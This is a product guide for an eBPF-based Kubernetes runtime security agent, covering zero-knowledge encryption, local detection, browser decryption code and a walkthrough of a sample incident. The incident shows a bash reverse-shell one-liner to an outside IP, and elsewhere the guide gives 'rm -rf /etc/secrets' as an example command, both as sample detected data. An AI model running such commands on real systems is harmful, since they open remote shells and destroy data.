Tier 3 Deployment & Customer Guide
Overview
Tier 3 (codename EcheDeep) is EchelonGraph's eBPF-based runtime security agent. It runs entirely on your Kubernetes cluster and feeds telemetry to your EchelonGraph SaaS tenant — encrypted with your own keys before it ever leaves your environment.
> Zero-knowledge by design. Your raw traffic, process events, and runtime findings are encrypted on-host with a per-event Data Encryption Key (DEK), wrapped under your customer-managed KMS key (AWS / GCP / Vault), and shipped as ciphertext. EchelonGraph SaaS stores ciphertext + indexed metadata only. Without your KMS, we cannot decrypt.
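The envelope scheme described above can be sketched with the Web Crypto API. This is a minimal illustration under stated assumptions, not the agent's implementation. A local AES-256 key stands in for your KMS key; in Tier 3 the wrap and unwrap steps are calls to AWS KMS, Cloud KMS, or Vault Transit. The function names and the byte layout are hypothetical and are not the Tier 3 wire format.

```typescript
// Minimal envelope-encryption sketch (Web Crypto, browser or Node 20+).
// ASSUMPTION: `kek` is a local AES-256-GCM key standing in for your KMS key.
// In Tier 3 the wrap/unwrap steps are KMS calls and the KEK never leaves the KMS.
// The byte layout below is hypothetical, not the Tier 3 wire format.

interface Envelope {
  nonce: Uint8Array;      // 12-byte AES-GCM nonce for the payload
  ciphertext: Uint8Array; // payload ciphertext; Web Crypto appends the 16-byte tag
  wrappedDek: Uint8Array; // 12-byte nonce || encrypted DEK || 16-byte tag
}

async function gcmEncrypt(key: CryptoKey, data: Uint8Array) {
  const nonce = crypto.getRandomValues(new Uint8Array(12));
  const ct = await crypto.subtle.encrypt({ name: "AES-GCM", iv: nonce }, key, data);
  return { nonce, ct: new Uint8Array(ct) };
}

async function sealEnvelope(kek: CryptoKey, plaintext: Uint8Array): Promise<Envelope> {
  // 1. Fresh 32-byte DEK for this event.
  const dekBytes = crypto.getRandomValues(new Uint8Array(32));
  const dek = await crypto.subtle.importKey("raw", dekBytes, "AES-GCM", false, ["encrypt"]);
  // 2. Encrypt the sensitive payload under the DEK.
  const payload = await gcmEncrypt(dek, plaintext);
  // 3. Wrap the DEK under the KEK (stand-in for a KMS Encrypt call).
  const wrapped = await gcmEncrypt(kek, dekBytes);
  dekBytes.fill(0); // best effort: clears our copy, not the CryptoKey's internal copy
  const wrappedDek = new Uint8Array(12 + wrapped.ct.length);
  wrappedDek.set(wrapped.nonce, 0);
  wrappedDek.set(wrapped.ct, 12);
  return { nonce: payload.nonce, ciphertext: payload.ct, wrappedDek };
}

async function openEnvelope(kek: CryptoKey, env: Envelope): Promise<Uint8Array> {
  // Unwrap the DEK (stand-in for a KMS Decrypt call).
  const dekBytes = new Uint8Array(
    await crypto.subtle.decrypt(
      { name: "AES-GCM", iv: env.wrappedDek.slice(0, 12) },
      kek,
      env.wrappedDek.slice(12),
    ),
  );
  const dek = await crypto.subtle.importKey("raw", dekBytes, "AES-GCM", false, ["decrypt"]);
  dekBytes.fill(0);
  // Decrypt the payload; rejects if the ciphertext or tag was tampered with.
  const pt = await crypto.subtle.decrypt({ name: "AES-GCM", iv: env.nonce }, dek, env.ciphertext);
  return new Uint8Array(pt);
}
```

Because every event gets its own DEK, exposing one DEK exposes only that event, and the only party that can turn a wrapped DEK back into a usable key is whoever holds the KEK.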
Shipped capabilities (chart 0.3.0 · agent 1.16.0, all 14 phases live):
- T3.0 — Helm chart + ZK pipeline + agent enrollment
- T3.1 — eBPF multi-hook (XDP + TC + tracepoints) with safety scanner
- T3.2 — PII auto-stripping (11 default rules) + envelope encryption
- T3.3 — Shadow API discovery (HTTP/2, gRPC, GraphQL, WebSocket, TLS-SNI)
- T3.4 — Process monitoring (5 detection rule families with MITRE mapping)
- T3.5 — ML anomaly detection (24h baseline + EWMA + 4 rules)
- T3.6 — Threat intelligence (abuse.ch URLhaus + Feodo Tracker, CISA KEV, custom STIX 2.1 / TAXII 2.1)
- T3.7 — Auto-remediation (9 K8s + Terraform patch templates, GitHub PR mode, Slack notifications)
- T3.8 — Hardware KMS (AWS / GCP / Vault) with async DEK rotation
- T3.9 — Custom compliance framework builder (DORA / NIS2 / CMMC / FedRAMP templates)
- T3.10 — Enterprise packaging (Helm OCI, Grafana dashboard, 11 PrometheusRule alerts, air-gap bundle)
- T3.11 — Browser SDK (Vault Transit) — TypeScript SDK using Web Crypto API for in-browser ZK decryption; backend GET /api/v1/zk/config; migration 045 (tenant_zk_config table); admin PUT/DELETE for provider config
- T3.12 — Browser SDK AWS KMS — hand-rolled SigV4 signer (Web Crypto HMAC-SHA256), ~7 KB gzipped; auth via Cognito Identity Pool / AssumeRoleWithWebIdentity / IAM Roles Anywhere
- T3.13 — Browser SDK GCP Cloud KMS — REST + bearer-token, ~3 KB gzipped; auth via Google Identity Services / Workload Identity Federation
Zero-Knowledge Architecture — what we see vs. what we don't
The single most-asked question from prospective customers is: *"What can EchelonGraph staff actually read about my workloads?"* Honest answer:
What we see (indexed metadata)
- Tenant ID + agent ID + pod ID + namespace name
- Rule ID of every emitted finding (e.g. T3.4-PROC-REVERSE-SHELL, T3.6-IOC-MATCH)
- Severity + MITRE ATT&CK technique tag
- Timestamp + event count
- Wrapped DEK (your KMS-encrypted key — useless to us without your KMS)
- Ciphertext payload of the actual event detail
What we cannot decrypt without your KMS
- Process command lines (e.g. /bin/bash -c "rm -rf /etc/secrets") — encrypted
- Destination IP addresses of network connections — encrypted
- HTTP request paths + headers — encrypted (PII headers stripped before encryption)
- File paths accessed by sensitive processes — encrypted
- Shell environment variables — encrypted
- TLS SNI hostnames + DNS query targets — encrypted
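Because PII headers are stripped before encryption, they are absent even from the payload your analyst later unlocks. A minimal sketch of that kind of pre-encryption filter follows. The header list and value patterns are hypothetical examples; the 11 default T3.2 rules are not enumerated in this guide.

```typescript
// Hypothetical header deny-list: illustrative only, not the T3.2 default rule set.
const PII_HEADERS = new Set(["authorization", "cookie", "set-cookie", "proxy-authorization", "x-api-key"]);

// Hypothetical value patterns, redacted wherever they appear in retained headers.
const PII_PATTERNS: RegExp[] = [
  /[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}/g, // email addresses
  /\b\d{3}-\d{2}-\d{4}\b/g,                          // US SSN format
];

// Runs on the host before envelope encryption, so stripped values never exist
// in any ciphertext, not even the copy your analyst can unlock.
function stripPii(headers: Record<string, string>): Record<string, string> {
  const out: Record<string, string> = {};
  for (const [name, value] of Object.entries(headers)) {
    if (PII_HEADERS.has(name.toLowerCase())) continue; // drop the whole header
    let v = value;
    for (const re of PII_PATTERNS) v = v.replace(re, "[REDACTED]");
    out[name] = v;
  }
  return out;
}
```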
But how do alerts work if you can't read our data?
This follows directly from the question above, and the answer is straightforward: detection happens on your servers, before encryption. The EchelonGraph agent on your host runs the ML anomaly engine, process monitoring rules, threat-intel matching, shadow API discovery, and all other detection logic locally, while the data is still in plaintext. By the time anything reaches our cloud, the *decision* ("is this suspicious?") has already been made.
Each finding has two parts:
| Part | Encrypted? | What we use it for |
|---|---|---|
| Metadata | No (plaintext) | Routing alerts to Slack/PagerDuty/email/webhooks, populating dashboards, computing compliance scores, threshold-based alerting, MITRE ATT&CK heatmaps |
| Payload | Yes — locked with your KMS | Only forensic investigation — your analyst unlocks it in their browser when they click "view details" |
What's in the metadata (we read this freely; it is what powers your alerts):
- Rule ID (e.g. T3.4-PROC-REVERSE-SHELL, T3.6-IOC-MATCH, T3.5-ANOMALY-TRAFFIC-SPIKE)
- Severity (critical / high / medium / low)
- MITRE ATT&CK technique tag (e.g. T1059.004, Unix Shell)
- Timestamp + event count
- Tenant ID, agent ID, pod name, namespace
- Confidence score (0–1)
What's in the encrypted payload (we cannot read this):
- Process command lines (e.g. /bin/bash -c "rm -rf /etc/secrets")
- File paths accessed by sensitive processes
- Destination IP addresses + DNS query targets
- HTTP request bodies + headers (with PII auto-stripped before encrypt)
- TLS SNI hostnames
- Shell environment variables
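The two lists above amount to a split performed on the host before encryption. A minimal sketch, assuming hypothetical camelCase field names modelled on the sample finding later in this guide; it is an illustration, not the agent's code.

```typescript
// Hypothetical field names, modelled on the sample finding later in this guide.
const METADATA_KEYS = [
  "tenantId", "agentId", "pod", "namespace", "ruleId",
  "severity", "mitreTechnique", "ts", "eventCount", "confidence",
] as const;
type MetadataKey = (typeof METADATA_KEYS)[number];

interface SplitFinding {
  metadata: Partial<Record<MetadataKey, unknown>>; // shipped in plaintext
  payload: Record<string, unknown>;                // handed to envelope encryption
}

function splitFinding(event: Record<string, unknown>): SplitFinding {
  const allowed = new Set<string>(METADATA_KEYS);
  const metadata: Partial<Record<MetadataKey, unknown>> = {};
  const payload: Record<string, unknown> = {};
  for (const [key, value] of Object.entries(event)) {
    if (allowed.has(key)) metadata[key as MetadataKey] = value;
    else payload[key] = value; // anything not allow-listed defaults to the encrypted side
  }
  return { metadata, payload };
}
```

The sketch uses an allow-list rather than a deny-list on purpose: a field added to events later lands in the encrypted payload unless someone explicitly decides it is safe as metadata.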
So when your alert fires saying **"5 reverse-shell attempts in production namespace in the last 10 minutes"**, the count + rule + namespace are all plaintext metadata. We can route the alert. When the on-call analyst clicks the alert and wants to see *which* processes triggered it — that's when their browser unlocks the encrypted payload via your KMS.
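An alert such as "5 reverse-shell attempts in the production namespace in the last 10 minutes" needs only rule ID, namespace, timestamp, and event count. A minimal sketch of that windowed count over metadata records; the record shape, function names, and message format are hypothetical.

```typescript
// Hypothetical metadata record: plaintext fields only, no payload access.
interface FindingMeta {
  ruleId: string;
  namespace: string;
  ts: string;         // ISO-8601 timestamp
  eventCount: number;
}

// Sum event counts for one rule + namespace within the window (now - windowMs, now].
function countInWindow(
  findings: FindingMeta[], ruleId: string, namespace: string, now: Date, windowMs: number,
): number {
  const end = now.getTime();
  const start = end - windowMs;
  let total = 0;
  for (const f of findings) {
    const t = Date.parse(f.ts);
    if (f.ruleId === ruleId && f.namespace === namespace && t > start && t <= end) {
      total += f.eventCount;
    }
  }
  return total;
}

function alertSummary(count: number, ruleId: string, namespace: string, minutes: number): string {
  return `${count} × ${ruleId} in namespace ${namespace} in the last ${minutes} minutes`;
}
```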
> Why this split is the right call. Detection logic is heavy compute and needs the raw data; running it close to the data (on your host) is faster and more accurate. Alert routing is orchestration; it just needs to know "something fired" plus a few metadata fields. Investigation is rare (1–2% of findings), so it's reasonable for those to require an extra step (browser unlock). The trade-off: we lose the ability to retroactively re-run detection on old data; that has to happen on your host with a fresh agent version.
How your data stays private — end-to-end
In a single picture: data is locked the moment it's collected on your servers, only the locked version is sent to us, and the only place it ever gets unlocked is inside your analyst's browser — using a key that comes directly from your encryption service, not from us.
Your encryption service (YOU CONTROL · AWS · GCP · Vault)
In your cloud account, never EchelonGraph's. Both step 1 (your agent) and step 3 (your analyst's browser) call this service directly to lock and unlock data. We never call it. We never have a copy of the key.
- Your master key NEVER leaves your account
- All wrapping and unwrapping of data keys happens inside your KMS
- Every unlock is written to your KMS audit log
Step 1: Your servers (YOU CONTROL)
The EchelonGraph agent runs here
- Watches what's happening on your computers
- Locks each piece of data the moment it's collected
- Calls YOUR encryption service to lock the key — never us
Step 2: EchelonGraph cloud (ECHELONGRAPH SAAS)
We only ever see locked data
- Stores locked data plus the alert metadata (when, what type)
- Cannot unlock — we don't have your key
- Even a database breach keeps your data unreadable
Step 3: Your analyst's browser (YOU CONTROL)
The only place data gets unlocked
- Browser unlocks the data key by calling YOUR KMS directly
- The unlock request never passes through EchelonGraph
- Data key wiped from browser memory right after use; decrypted details wiped the moment they navigate away
Why we can't read your data, even if we wanted to
This isn't a marketing claim — it's how the system is built. Every statement below is something you can independently verify, either with your cloud provider, with your browser's developer tools, or by reading our open-source code.
Your master key never leaves your account
EchelonGraph never has a copy of your encryption key. It stays inside your AWS, GCP, or Vault account — locked in tamper-resistant hardware, like a physical safe.
Backed by
- We only call your encryption service to lock and unlock data — we never receive the key itself
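- Your provider won't export the key material: AWS KMS and Cloud KMS keys cannot be exported, and Vault Transit keys can't either unless you deliberately create them as exportable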
- Even our own staff would have nothing to leak in a worst-case breach
Decryption happens in your browser, not on our servers
When your analyst clicks "view details", their browser unlocks the data directly. The unlock request goes from their computer straight to your encryption service — it never passes through us.
Backed by
- Your browser → your AWS / GCP / Vault, direct, no proxy
- EchelonGraph is not in the decryption path, so we never see the unlocked data
- Your corporate firewall logs will confirm this independently
Even if EchelonGraph vanished, your data stays safe
We only ever store the locked version. If our company shut down tomorrow, what we hold remains permanently unreadable to anyone — including any future buyer, our former employees, or anyone who breaches our database.
Backed by
- We can't be subpoenaed into producing plaintext we don't have
- Court orders against us don't bypass your encryption — they hit a wall
- Supports compliance with GDPR Art. 25 (data protection by design and by default), DPDP, EU DORA, US CMMC 2.0
Every unlock is recorded in your audit trail
Your cloud provider logs every single time anyone unlocks a piece of your data — including which person unlocked it. The logs always show your team members' names, never EchelonGraph's, because we never make the call.
Backed by
- Logs are written by your provider, not by us — we can't tamper with them
- If our staff ever decrypted your data, the log would prove it (and we'd be in violation)
- Auditors can use this log as independent evidence that only your team decrypts your data
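Checking that log can be automated. A minimal sketch that flags every decrypt attempt on your key from an identity outside your domain. It assumes records shaped like the simplified audit-log sample later in this guide (caller_id, key_name, success); real Vault audit entries are JSON objects with different field names, so the hypothetical callerOf accessor would need adapting to your format.

```typescript
// Records shaped like the simplified audit-log sample in this guide.
// ASSUMPTION: real Vault audit entries use different field names.
interface DecryptAuditRecord {
  caller_id: string;
  key_name: string;
  success: boolean;
}

// Adapt this accessor if your audit format stores identity elsewhere.
function callerOf(r: DecryptAuditRecord): string {
  return r.caller_id;
}

// Every caller outside `allowedDomain` that attempted a decrypt on `keyName`.
// Failed attempts are included: a denied call from an unknown identity still matters.
function unexpectedCallers(records: DecryptAuditRecord[], keyName: string, allowedDomain: string): string[] {
  const suffix = "@" + allowedDomain.toLowerCase();
  const flagged = new Set<string>();
  for (const r of records) {
    if (r.key_name !== keyName) continue;
    const caller = callerOf(r);
    if (!caller.toLowerCase().endsWith(suffix)) flagged.add(caller);
  }
  return Array.from(flagged);
}
```

An empty result over your retention window is the property this section claims: no decrypt call against your key came from anyone but your own team.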
The decryption code is open-source — verify it yourself
The exact code that runs in your browser to unlock data is published under Apache 2.0. Any developer on your team can read every line. We've also published 111 automated tests showing what it does.
Backed by
- Tests prove the wire format, the auth flow, and that keys are wiped from memory
- Pull request history shows every change to the security-critical code
- Your team can audit, fork, or replace it without permission from us
How your dashboard actually calls your KMS to unlock data
The diagram above shows the flow at the architecture level. Here's the same flow at the code level — what your developer wires into your dashboard. The pattern is the same shape for every provider: your dashboard's auth layer fetches a token or credentials from the customer's IdP, then hands them to the SDK's React hook. The SDK calls the customer's KMS directly when an analyst clicks "view locked details" — never through EchelonGraph.
How HashiCorp Vault works: Customer signs into Vault via OIDC; dashboard captures the X-Vault-Token and passes it to the SDK.
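1. Get a Vault token by signing the user in through your IdP (Okta / Azure AD / Auth0 / Google Workspace) and exchanging the resulting ID token via Vault's JWT/OIDC auth method.
// In your dashboard's auth layer.
// Hypothetical IdP helper: replace with your IdP SDK's call that returns an ID token.
declare const myIdP: { getIdToken(): Promise<string> };

async function getVaultToken(): Promise<string> {
  // Your IdP returns a signed ID token (JWT) for the signed-in user.
  const idToken = await myIdP.getIdToken();
  // Vault validates the JWT against a JWT-type role ("echelongraph-analyst"
  // is a placeholder name) and returns a Vault token.
  const res = await fetch("https://vault.your-company.com/v1/auth/oidc/login", {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({ role: "echelongraph-analyst", jwt: idToken }),
  });
  if (!res.ok) throw new Error(`Vault login failed: HTTP ${res.status}`);
  const json = await res.json();
  return json.auth.client_token; // lifetime is set by the role's token_ttl
}
2. Use the token in a dashboard component. The SDK sends it as X-Vault-Token directly to YOUR Vault, with no proxy through EchelonGraph.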
import { useEffect, useState } from "react";
import { useZkConfig, useZkDecrypt } from "@echelongraph/zkdecrypt";

function FindingDetail({ finding, jwt }) {
  const [vaultToken, setVaultToken] = useState<string | null>(null);
  useEffect(() => { getVaultToken().then(setVaultToken).catch(console.error); }, []);

  const { config } = useZkConfig(jwt); // GET /api/v1/zk/config
  const { decrypt } = useZkDecrypt(config, {
    vaultToken: vaultToken ?? "", // your token, not ours
  });

  return (
    <button disabled={vaultToken === null} onClick={async () => {
      const { plaintext } = await decrypt({
        envelope: finding.encryptedPayload, // from EchelonGraph API
        tenantId: finding.tenantId,
        agentId: finding.agentId,
      });
      // Decryption happened in this browser; plaintext is a Uint8Array
      console.log(new TextDecoder().decode(plaintext));
    }}>
      View locked details
    </button>
  );
}
- Vault tokens expire according to the role's token_ttl; the SDK surfaces 401/403 as kms_auth_failed, so re-prompt for the OIDC login when you see that
- The Vault policy attached to your analysts' role must grant the update capability on transit/decrypt/echelongraph (the Transit key configured for EchelonGraph); check your Vault audit log to see every unlock
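Under the hood, the unlock is Vault's standard Transit decrypt call (POST /v1/transit/decrypt/&lt;key&gt; with an X-Vault-Token header; Vault returns the unwrapped DEK base64-encoded in data.plaintext). A minimal sketch of building that request and reading the response, assuming Transit is mounted at the default transit/ path and the key is named echelongraph as in this guide. The helper names and the kms_error code are hypothetical, not SDK exports; kms_auth_failed mirrors the error this page describes.

```typescript
interface VaultRequest {
  url: string;
  init: { method: "POST"; headers: Record<string, string>; body: string };
}

// Build the Transit decrypt request. ASSUMPTION: Transit is mounted at "transit".
function buildTransitDecrypt(vaultAddr: string, keyName: string, token: string, wrappedDek: string): VaultRequest {
  return {
    url: `${vaultAddr.replace(/\/+$/, "")}/v1/transit/decrypt/${encodeURIComponent(keyName)}`,
    init: {
      method: "POST",
      headers: { "X-Vault-Token": token, "Content-Type": "application/json" },
      body: JSON.stringify({ ciphertext: wrappedDek }), // e.g. "vault:v1:..."
    },
  };
}

// Vault returns the unwrapped DEK base64-encoded in data.plaintext.
function parseTransitDecrypt(json: { data: { plaintext: string } }): Uint8Array {
  const bin = atob(json.data.plaintext);
  const out = new Uint8Array(bin.length);
  for (let i = 0; i < bin.length; i++) out[i] = bin.charCodeAt(i);
  return out;
}

// 401/403: token expired or lacks policy, so re-run the OIDC login.
function classifyStatus(status: number): "ok" | "kms_auth_failed" | "kms_error" {
  if (status >= 200 && status < 300) return "ok";
  if (status === 401 || status === 403) return "kms_auth_failed";
  return "kms_error";
}
```

In the browser the request would be sent with fetch(req.url, req.init). Its destination is your Vault host, which is why the DevTools check in the incident walkthrough shows vault.acme.com rather than echelongraph.io.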
For the complete API reference (envelope wire format, error codes, retry policy, browser/Node compatibility, dispose lifecycle, & admin write endpoint to configure your KMS), see /docs/tier3-zk-decryption. The SDK source is open under Apache 2.0 at frontend/src/lib/zkdecrypt/.
A complete incident — end-to-end with realistic data
Everything above is architecture and code. Here's what an actual production incident looks like, step by step, with real-shaped sample data at every layer of the pipeline. Follow the timeline from kernel-level eBPF detection through to GitHub-PR-driven auto-remediation. Watch the boxes marked ✓ Plaintext (data we can read freely) and 🔒 (data we cannot read at all): that contrast is the entire zero-knowledge promise made concrete.
- T+0.000s · Your host (worker-3.acme-prod) · eBPF kernel hook
Reverse-shell process spawns inside a production pod
At 14:32:07.123 UTC, the gunicorn worker in the checkout-api deployment forks a new bash process. The eBPF tracepoint hook on the customer's host captures the execve system call and forwards it to the EchelonGraph agent for evaluation.
Raw kernel event (only on customer's host) · ✓ Plaintext
PID: 3847
PPID: 3128 (gunicorn)
Comm: bash
Args: /bin/bash -c "bash -i >& /dev/tcp/198.51.100.74/4444 0>&1"
Cwd: /tmp
UID: 33 (www-data)
Pod: checkout-api-pod-7b9c
NS: production
Node: worker-3.acme-prod
This data NEVER leaves the host in plaintext.
- T+0.012s · EchelonGraph agent (Tentacle DaemonSet) · Detection engines run locally
Two detection rules fire on the customer's host
The agent evaluates the event against every Tier 3 detection engine, all running locally on the customer's host with full plaintext access. Two rules match: the process monitor flags the bash command line as a reverse shell (T3.4), and the threat-intel matcher recognises the destination IP from the abuse.ch feed (T3.6).
Local detection result (still on host, plaintext) · ✓ Plaintext
rules_matched: [T3.4-PROC-REVERSE-SHELL, T3.6-IOC-MATCH]
mitre_technique: T1059.004 (Unix Shell)
severity: critical
confidence: 0.97
ioc_source: abuse.ch URLhaus
finding_id: f-9d4e2a17
event_count: 1
Detection logic runs in-process on the host. By this point the verdict is already final; EchelonGraph cloud never participates in detection.
- T+0.018s · EchelonGraph agent · Encrypt + ship
Agent locks the sensitive payload before shipping
The agent generates a fresh 32-byte data key (DEK), AES-256-GCM encrypts the sensitive details (command line, file paths, destination IP, etc.), and asks the customer's KMS to wrap the DEK. The wrapped DEK plus ciphertext are bundled with the plaintext metadata and shipped over TLS 1.3 gRPC.
Plaintext metadata sent to EchelonGraph · ✓ Plaintext
{
  "tenant_id": "acme-corp",
  "agent_id": "tentacle-worker-3",
  "rule_id": "T3.4-PROC-REVERSE-SHELL",
  "severity": "critical",
  "mitre_technique": "T1059.004",
  "ts": "2026-05-07T14:32:07.123Z",
  "pod": "checkout-api-pod-7b9c",
  "namespace": "production",
  "confidence": 0.97,
  "ioc_match": "T3.6-IOC-MATCH",
  "event_count": 1
}
EchelonGraph reads this freely; it's how alerts get routed.
Encrypted payload (locked with the customer's KMS) · 🔒 We CANNOT read
nonce (12 bytes hex): a3f2e1c509bb47c1d4e832af
ciphertext (245 bytes b64): kJh3T9xQ4Z2wL1vPdR8mN0yQp7VksB8xJq2fT5rY3wHmN9pK4tA0iL6e... (truncated, 245 bytes total)
AEAD tag (16 bytes hex): e1f8d3c4b29a5e6708d2f4a1... (truncated)
wrapped-DEK (KMS blob): AQECAHj8H5jK4Z9wL...
Without the customer's KMS key, this is just random bytes; even our own DBA can't reconstruct the command line.
- T+0.450s · EchelonGraph cloud · Ingester → CloudSQL + ClickHouse
EchelonGraph stores the row — ciphertext stays opaque to us
The Ingester validates the wire format, writes the metadata columns to Postgres for the alert layer to query, and pushes the ciphertext + wrapped DEK to ClickHouse with a 90-day retention TTL. We index every metadata field for routing, compliance reporting, and dashboard queries.
Stored row (what an EchelonGraph engineer can SELECT) · ✓ Plaintext
tenant_id         | acme-corp
rule_id           | T3.4-PROC-REVERSE-SHELL
severity          | critical
mitre_technique   | T1059.004
ts                | 2026-05-07 14:32:07.123
pod               | checkout-api-pod-7b9c
namespace         | production
confidence        | 0.97
ioc_match         | T3.6-IOC-MATCH
encrypted_payload | \xa3f2e1c509bb...e1f8d3c4   ← unreadable
wrapped_dek       | \xAQECAHj8H5jK4Z9wL...      ← unreadable
Our staff can run analytics on metadata. The two unreadable columns are what protects you.
- T+0.620s · EchelonGraph alert manager · Slack / PagerDuty / webhook routing
Alert fires — built entirely from plaintext metadata
A pre-configured rule (“CRITICAL severity in production namespace”) matches. Alert manager builds a Slack message using the metadata fields only and POSTs it to the customer's Slack webhook. The encrypted payload is not touched.
Slack message that fires in #soc-prod-alerts · ✓ Plaintext
🚨 CRITICAL: Reverse shell in production
Tenant: acme-corp · Pod: checkout-api-pod-7b9c
Namespace: production · Confidence: 97%
MITRE: T1059.004 (Unix Shell)
IOC match: known C2 from abuse.ch URLhaus
Time: 2026-05-07 14:32:07 UTC
[Investigate ↗] [Acknowledge] [Auto-remediate]
The Slack message contains no details from the encrypted payload. Routing works without us reading any of it.
- T+27s · Alice (SOC analyst) · Opens app.echelongraph.io/findings/f-9d4e2a17
Analyst opens the dashboard from the Slack alert
Alice clicks [Investigate ↗] in Slack. Her browser navigates to app.echelongraph.io, the SPA loads, and the dashboard fetches the finding. The metadata renders immediately, but the “What process ran?”, “Where did it connect?”, and “Full command-line” sections show a 🔒 Locked — click to unlock placeholder.
- T+30s · Browser SDK (frontend/src/lib/zkdecrypt) · Calls Alice's Vault DIRECTLY
Browser unlocks the data key via Vault — bypasses EchelonGraph
Alice clicks “view locked details”. Her browser already has a Vault token from this morning's OIDC sign-in (cached in sessionStorage). The SDK POSTs the wrapped DEK to vault.acme.com directly. Vault unwraps it server-side with the Transit key and returns the plaintext DEK. The SDK runs AES-GCM decryption in the browser using the Web Crypto API, and the plaintext renders. zeroBytes(DEK) then wipes the key from the JS heap.
Browser → Vault POST (visible in DevTools Network tab) · 🔐 Customer's KMS
POST https://vault.acme.com/v1/transit/decrypt/echelongraph
X-Vault-Token: hvs.CAESI...        ← Alice's OIDC-derived token
Content-Type: application/json
{ "ciphertext": "vault:v1:AQECAHj8H5jK4Z9wL..." }   ← wrapped DEK
← Response from Vault:
{ "data": { "plaintext": "kJh3T9xQ4Z2wL1vPdR8mN0y..." } }
Open Alice's DevTools Network tab and you'll see this exact request going to vault.acme.com, NOT to echelongraph.io.
Plaintext rendered in Alice's browser (and only there) · ✓ Plaintext
Process command line: /bin/bash -c "bash -i >& /dev/tcp/198.51.100.74/4444 0>&1"
Working directory: /tmp
UID: 33 (www-data), gunicorn's own user, no privilege escalation
PID: 3847 · Parent: gunicorn (PID 3128)
Destination: 198.51.100.74:4444
IOC source: abuse.ch URLhaus
First seen: 2026-04-22, known C2 for "RedShell" toolkit
This text exists only in Alice's browser tab memory. When she navigates away, dispose() wipes it.
- T+30.5s · Acme's Vault audit log · Records the unlock with caller identity
Vault writes an audit-log entry — proving Alice unlocked it, not us
Vault's audit log records every Decrypt call with the caller's federated identity. Acme's SOC team (or an external auditor) can grep this log to confirm that EchelonGraph staff have never made a decrypt call against their key.
Acme's Vault audit log (their copy, written by their Vault) · 📜 Customer's log
2026-05-07 14:32:37 UTC · vault.transit.decrypt
caller_id: alice@acme-corp.com
auth_method: oidc/okta
key_name: echelongraph
success: true
request_id: 7c45-ab12-9e30-4f15
remote_addr: 203.0.113.45 (Alice's office IP)
The caller_id is Alice's IdP identity, never an EchelonGraph staff identity, because we never make the call.
- T+45s · Auto-remediation engine (T3.7) · Generates IaC patch + opens GitHub PR
Alice triggers auto-remediation — a NetworkPolicy PR opens
Alice clicks Auto-remediate. The remediation engine selects the K8s NetworkPolicy template (matching the finding's category), substitutes the offending pod labels, and opens a GitHub PR in acme-corp/infra-iac. Alice (admin role) clicks Merge → ArgoCD applies the policy → the compromised pod loses egress in < 60 seconds.
Auto-generated NetworkPolicy (committed to acme-corp/infra-iac) · ✓ Plaintext
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: deny-egress-checkout-api-incident-f9d4e2a17
  namespace: production
  annotations:
    echelongraph.io/finding: f-9d4e2a17
    echelongraph.io/rule: T3.4-PROC-REVERSE-SHELL
spec:
  podSelector:
    matchLabels:
      app: checkout-api
  policyTypes: [Egress]
  egress: []   # deny all outbound traffic
PR opened by github-app/echelongraph-bot · approved by alice@acme-corp.com · merged at 14:33:41 · ArgoCD synced at 14:34:09.
Detection ran on Acme's host (T+0 to T+18 ms). Encryption + ship took ~430 ms over TLS 1.3 gRPC. The alert reached Slack 620 ms after the kernel event. Alice opened the dashboard, unlocked the encrypted payload via her own Vault, triggered remediation, and had the compromised pod's egress cut off about two minutes after the kernel event (ArgoCD synced at 14:34:09). Throughout the entire incident, EchelonGraph never read the bash command line, the destination IP, or any other detail of the actual exploit, only the metadata needed to route the alert. Acme's Vault audit log proves it: every Decrypt call shows alice@acme-corp.com as the caller, never an EchelonGraph identity.
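To make the T+0.012s step concrete, here is a toy version of the two checks that fired, run against the sample event. The regular expressions, the IOC set, and the function names are illustrative assumptions only; the real T3.4 and T3.6 rule logic is not shown in this guide.

```typescript
// Toy versions of two local checks. ASSUMPTION: patterns and IOC set are
// illustrative; the real T3.4 / T3.6 rule logic is not reproduced here.
interface ExecEvent {
  comm: string;
  args: string;
  destIp?: string; // from a connect() event, when available
}

// Hypothetical reverse-shell indicators: an interactive shell wired to a socket.
const REVERSE_SHELL_PATTERNS: RegExp[] = [
  /\b(ba|z|k)?sh\s+-i\b.*\/dev\/(tcp|udp)\//,
  /\bnc(at)?\b.*\s-e\s+\/bin\/(ba)?sh\b/,
];

function detect(ev: ExecEvent, iocIps: Set<string>): string[] {
  const rules: string[] = [];
  if (REVERSE_SHELL_PATTERNS.some((re) => re.test(ev.args))) {
    rules.push("T3.4-PROC-REVERSE-SHELL");
  }
  // Fall back to the /dev/tcp/<ip>/ target in the command line.
  const ip = ev.destIp ?? ev.args.match(/\/dev\/(?:tcp|udp)\/([\d.]+)\//)?.[1];
  if (ip !== undefined && iocIps.has(ip)) rules.push("T3.6-IOC-MATCH");
  return rules;
}
```

Both checks need the plaintext command line, which is exactly why they run on the host before the payload is encrypted.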
Two decryption paths
Browser SDK (T3.11+) — the dashboard at app.echelongraph.io renders decrypted detail in the operator's browser using the open-source @echelongraph/zkdecrypt TypeScript SDK. Customer signs into their KMS via OIDC; the SDK calls the customer's Vault / AWS / GCP KMS directly from the browser to unwrap each event's DEK. EchelonGraph backend never sees the plaintext.
- Vault Transit: shipped in T3.11.
- AWS KMS via SigV4 + Cognito / STS federation: shipped in T3.12.
- GCP Cloud KMS via Google Identity Services / Workload Identity Federation: shipped in T3.13.
Go SDK (sdk/zkdecrypt) — for SOC pipelines, SIEM forwarders, and analytics notebooks. Customer fetches the KEK from their KMS via the provider CLI (aws kms decrypt, gcloud kms decrypt, vault read), passes it to the SDK along with the encrypted envelope, gets back plaintext. Run anywhere Go runs — Lambda, Cloud Run, on-prem worker.
Both paths share the same envelope wire format. See /docs/tier3-zk-decryption for the full SDK reference.
Verifying the property
# Inspect the ciphertext directly in your CloudSQL — should be unreadable.
gcloud sql connect ... --database=echelongraph
> SELECT id, encrypted_payload FROM zk_telemetry LIMIT 1;
The encrypted_payload column is AES-256-GCM ciphertext. Even with full read access to our DB, an attacker (or an EchelonGraph employee) cannot reconstruct the underlying event.
Customer responsibilities
When you onboard Tier 3, here's what's on your side vs. ours:
| Responsibility | You | EchelonGraph |
|---|---|---|
| Provision Helm chart on your cluster | ✓ | — |
| Provide a customer-managed KMS key | ✓ | — |
| Set IAM policy / Vault token for the agent | ✓ | — |
| Configure NetworkPolicy egress to ingest endpoint | ✓ | — |
